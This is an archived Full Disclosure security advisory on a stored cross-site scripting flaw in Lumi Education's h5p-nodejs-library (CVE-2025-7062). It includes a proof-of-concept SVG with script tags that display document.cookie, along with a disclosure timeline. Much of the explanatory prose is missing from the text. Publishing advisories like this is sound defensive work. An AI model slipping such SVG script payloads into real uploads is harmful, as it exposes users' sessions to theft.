VULNARCHIVE

SCHUTZWERK-SA-2024-007: Stored Cross-Site Scripting via file upload in H5P module (h5p-nodejs-library) of Lumi Education

David Brown via Fulldisclosure ·

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512



Metadata
========

- - Affected product: h5p-nodejs-library

  the time of publication)
- - Vendor: Lumi Education UG
- - Problem type(s):

    - CWE-20 Improper Input Validation
- - CVE ID: CVE-2025-7062
- - CVE URL: https://www.cve.org/CVERecord?id=CVE-2025-7062
- - CVSS 4.0 score: 5.2
- - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-007/

Details
=======


content/content.json file.


content:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   version="1.1"
   id="svg2"
   sodipodi:docname="circle.svg"
   xmlns="http://www.w3.org/2000/svg";
   xmlns:svg="http://www.w3.org/2000/svg";>
  <script>alert("XSS Test");</script>
  <script>alert(document.cookie);</script>
  <circle

     id="path233"
     cx="98.428535"
     cy="68.415733"
     r="54.194405" />
</svg>



content/content.json as follows:

{
  "media": {
    "type": {
      "params": {
        "decorative": false,
        "contentName": "Image",
        "expandImage": "Expand Image",
        "minimizeImage": "Minimize Image",
        "file": {
          "path": "images/circle.svg",
          "mime": "image/svg+xml",
[...]



window.

Risk
====


additional roles to existing ones.

Solution/Mitigation
===================


allowed extension, such as XML, and have it executed.


from uploaded files.

Timeline
========

- - 2024-10-23 Vulnerability discovered
- - 2024-11-08 Initial contact attempt, email sent to c@lumi.education

- - 2024-11-28 Third contact attempt via a message in the Lumi Slack channel

  framework in their project
- - 2025-03-07 Release of h5p-nodejs-library v10.0.4

  excluded.

  with XSS content that is executed after loading

  received a response the same day

- - 2025-09-23 Exchange with the developer on details of the fix
- - 2025-09-24 Exchange with the developer on details of the fix

  received.

  received.

  received.

  reasons.
- - 2026-09-09 Advisory released

Credits
=======

The vulnerability was discovered by Florian Schmid of SCHUTZWERK GmbH.

Footnotes
=========


-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmqg+lcaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrtd7hAAt/fhW+fVFc5JlaevO/pu
OlVkBwTQjZcX3qxZRgAVbV0HuwLPh/YTgiCLjidVfAIzVJbQSU0eDKrt3G4t82Te
rhXkY0ctzwOGya3nIwEI/I/QpKH/W75NDRL2ewI7iiJB8guQWBZzb7cFSAOoeNMi
nUkdo35BwqNr+TccXjNVwnlsXHTdW1RbzIwE9yUHujjT7vkUNcoDftPoguBjRsG1
OSlcjqDvMPNkApQiXWniwz0wY/6WYQgt96RB96Wl0uJLMazLgtgVgso7rcZW3Sjd
pi1yHYD3f+/ch9iPQBFq0SIcnH+kJC2oNXypM0VDjtCdNt+KveiBnbJsl9zSTdHj
ylllLxE58bkVuONcInxHeo6MSRBGLAJ0Hiq1uHFeQuya6L53Lr5Nb65IVQJe3f2T
x56Gwhs+xhGr/hd0k/CmaRXxApFm8HPLr1M3uCPrJXzT6THBZxcuWcJr9WXUj1ZT
WNBHlf06aK8SWHtVDugeTJK38N/Esetc9Z8XY1PdiVp4ab0qJMi9w4YWtJgeeL2d
TbIObBSI0i9OR1GdrXvVKB6F/PvpuTHupCMR+2yI/mMEzb2KgDQiZpEqh1qOy01u
B+7bH2qwlnZrz6SL0vfZCwZ/KJbKf+/hSq+3V4XcK415cQsUZbT07y5qxUZIK/wE
npRisQyYZ+Z+QaMWsSxMf7c=
=pVF/
-----END PGP SIGNATURE-----


--
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories () schutzwerk com / www.schutzwerk.com

Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm /  HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/